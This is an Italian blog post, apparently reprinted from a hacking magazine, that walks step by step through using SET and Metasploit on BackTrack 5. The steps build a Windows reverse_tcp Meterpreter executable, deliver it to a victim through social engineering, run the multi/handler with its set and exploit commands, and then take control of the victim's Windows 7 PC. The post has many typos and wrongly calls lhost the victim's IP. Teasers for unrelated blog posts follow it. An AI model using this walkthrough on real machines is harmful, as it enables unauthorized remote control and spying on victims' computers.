SISTEMI OPERATIVI VULNERABILI.

-

SISTEMI OPERATIVI VULNERABILI
Le importazioni falle di sicurezza non ancora risolte negli OS più
diffusi consentono al pirata di intrufolarsi agevolmente nel nostro PC.


Abbiamo appena visto come al pirata basta un semplice comando per scoprire il
tipo di sistema operativo utilizzato dalla sua vittima. Ma per cosa gli servirà mai
saperlo? Ogni OS in circolazione, GNU-Linux incluso, ha i suoi punti deboli come ad
esempio eventuali porte lasciate aperte per assistenza remota o peggio ancora falle
di sicurezza non ancora risolte. Il numero di queste ultime è veramente alto e ciò 
è abbastanza preoccupante. Per quale motivo le software house non fanno qualcosa per
correggere questi bug di funzionamento? E rimarremo scioccati quando scopriremo che
lo stesso Windows 7, spacciato da Microsoft come sistema operativo sicuro, in realtà 
è bucabile in pochi minuti se non addirittura secondi. Ovviamente, però, è strettamente
necessaria la partecipazione della vittima: tramite la pratica del social engineering,
il pirata trasferisce un paylod nel sistema bersaglio, prendendone in definitiva il
pieno controllo. Per crearlo utilizza il software Set, nel quale il pirata si limita
alla semplice scelta di qualche opzione. La creazione del paylod è infatti del tutto
automatica ed il file eseguibile da trasferire sul PC della vittima viene restituito
nella directory /pentest/exploits/set. Analizziamo quondi ogni singola mossa compiuta
dal pirata.


TUTTO IN UN .EXE
Utilizzando Set, il pirata crea un paylod da utilizzare per accedere al PC della sua vittima.
AVVIO DE TOOL
A) Dopo aver avviato una nuova sessione del
Terminale, il pirata accede alla directory
pentest/exploits/set e lancia il comando .set
per avviare il software. Sceglie dunque l'opzione
4 per creare un paylod ed un listener da iniettare
poi nel PC della sua vittima.


B)OBIETTIVO WINDOWS
Supponendo che il pirata voglia colpire un PC
equipaggiato con Windows (quello rilevato in
precedenza da Nmap), il pirata digita 2 e conferma
con Invio per scegliere l'opzione Windows Reverse_TCP Meterpreter
(controllerà il PC vittima da terminale).


C)CREAZIONE BACKDOOR
Il pirata utilizza un file eseguibile che sfrutta una
backdoor attiva sul PC bersaglio. Digita quindi 16 e
conferma con Invio. Indica una porta di ascolto e preme 
nuovamente Invio. Attende dunque che l'.exe venga generato.








WINDOWS 7 BUCATO!
Creata la backdoor, il pirata riesce ad intrufolarsi nel PC della 
sua vittima e a controllarlo


A)IL FILE FONDAMENTALE
Utilizzando il file manager di BackTrack 5 R1,il
pirata raggiunge la directory set presente in 
pentest/exploits. Copia quindi il file msf.exe 
creato in precedenza e tramite pratiche di social
engineering(11) lo trasferisce sul PC della vittima
avviandolo.


B)METASPLOIT IN AZIONE
A questo punto il pirata avvia una nuova sessione
del Terminale e raggiunge il percorso /opt/frame
work/msf3. Da qui digita il comando ./msfconsole
per avviare il software Metasploit che utilizzerà
per controllare anche da remoto il sistema della 
sua vittima.


C)INDIRIZZO IP E PORTA
Il pirata lancia una serie di comandi: prima use
exploit/multi/handler e poi set paylod windows/
meterpreter/reverse_tcp. Indica l'indirizzo IP
della vittima con set lhost e la porta che ha configurato
in precedenza con set lport 4444.


D) TRAGUARDO RAGGIUNTO
Non gli resta che lanciare il comando exploit
ed attendere che la vittima avvii il file msf.exe
che il pirata ha trasferito in precedenza. Non appena
il pesce avrà abboccato, Metaploit restituirà un
messaggio di conferma ed avvierà il meterpreter
creato dal pirata.


E)NEL PC DELLA VITTIMA
Il pirata ha ora a disposizione una serie di comandi
che può utilizzare per controllare Windows 7 installato
nel PC del malcapitato. Per scoprirli digita help.
Per catturare ad esempio una schermata gli basta
semplicemente lanciare un comando screenshot.


F)PIENO CONTROLLO
Può inoltre avviare e gestire il Prompt dei comandi
di Windows digitando semplicemente execute-fcmd o
addirittura spegnere il PC della sua vittima lanciando
il comando shutdown. E non c'è antivirus o firewall
che tenga: anche Windows 7 è stato bucato.


Commenti

Posta un commento

Ciao a tutti voi, sono a chiedervi se avete preferenze per Post di vostro interesse
in modo da dare a tutti voi che mi seguite un aiuto maggiore, grazie per la vostra disponibilità.

Post popolari in questo blog

INSTAFETCH - Android -

-
Immagine
I NSTAFETCH Capita sempre più spesso di iniziare a leggere una pagina Web sullo smartphone e di volerla poi concludere sul PC o su di un  altro smartphone.Niente di più semplice grazie ai tanti servizi  di recupero Web ,il più famoso dei quali è sicuramente Instapaper. Instafetch è la versione per Android di questo software e permette  sia di salvare quello che si sta leggendo dal PC,sia di memorizzare  la pagina direttamente dallo smartphone.Se ci troviamo su PC (o anche su Mac e Linux) dovremo installare sulla barra del brawser un piccolo pulsante-scorciatoia dopo essersi registrati sul sito www.instapaper.com .Se invece ci troviamo sullo smartphone e  vogliamo continuare a leggere su PC dovremo aprire il menu  Condividi del brawser e da qui selezionare la voce Add to Instafetch . Sullo smartphone poi potremo visualizzare gli articoli conservati, quelli segnalati dagli amici e quelli che vorremmo mantenere  archiviati.La versione Pro di Instafetch permette anc
Continua a leggere

L'igiene dell'apparato scheletrico. Anatomia.

-
Immagine
L'igiene dell'apparato scheletrico. Anatomia. Certamente tutti sappiamo che lo scheletro costituisce “l'impalcatura” del nostro corpo, cioè ci permette di stare ritti, di muoverci ecc. Pochi però sanno che cosa bisogna fare per mantenere sana ed efficiente questa parte importante del corpo. Ebbene, in questo articolo parleremo delle cure e delle attenzioni che bisogna riservare allo scheletro. Bisogna iniziare fin dall'infanzia. La formazione dello scheletro, innanzitutto, va curata fin dai primi anni o meglio dai primi mesi di vita. Questo è infatti il periodo più importante, quando vengono messe le basi della nostra “impalcatura” e di conseguenza un errore può lasciare il segno per sempre. Per prevenire ogni complicazione è indispensabile prima di tutto curare l'alimentazione, in modo che contenga in dosi sufficienti le sostanze (calcio, fosforo e vitamina D) indispensabili alla “costruzione” e all'accrescimento delle ossa. I cibi più adatti
Continua a leggere

I pesci abissali. Zoologia marina.

-
Immagine
I pesci abissali. Zoologia marina. Talvolta le reti che i pescatori ritirano dal mare portano in superficie qualche pesce abissale,cioè qualcuno dei pesci che vivono anche al disotto dei 300 m di profondità. Sono animali dalle forme strane e mostruose:hanno bocche enormi e portano,quasi sempre,occhi grandi e sporgenti. Quando,nel secolo scorso,si cominciarono a studiare gli abissi marini ci si meravigliò di vedere questi animali quasi tutti muniti di occhi. Si pensava infatti che nelle tenebre delle profondità marine la vista non fosse un senso necessario;ma con successive ricerche ci si rese conto che il mare anche in profondità non è privo di luce. Molte specie di pesci posseggono organi luminosi con i quali producono luci fisse,ora guizzanti,e illuminano così l'ambiente in cui vivono;certe specie cieche sostituiscono invece la vista con un grande sviluppo degli organi tattili aventi l'aspetto di lunghi filamenti. Questi pesci sono poi d
Continua a leggere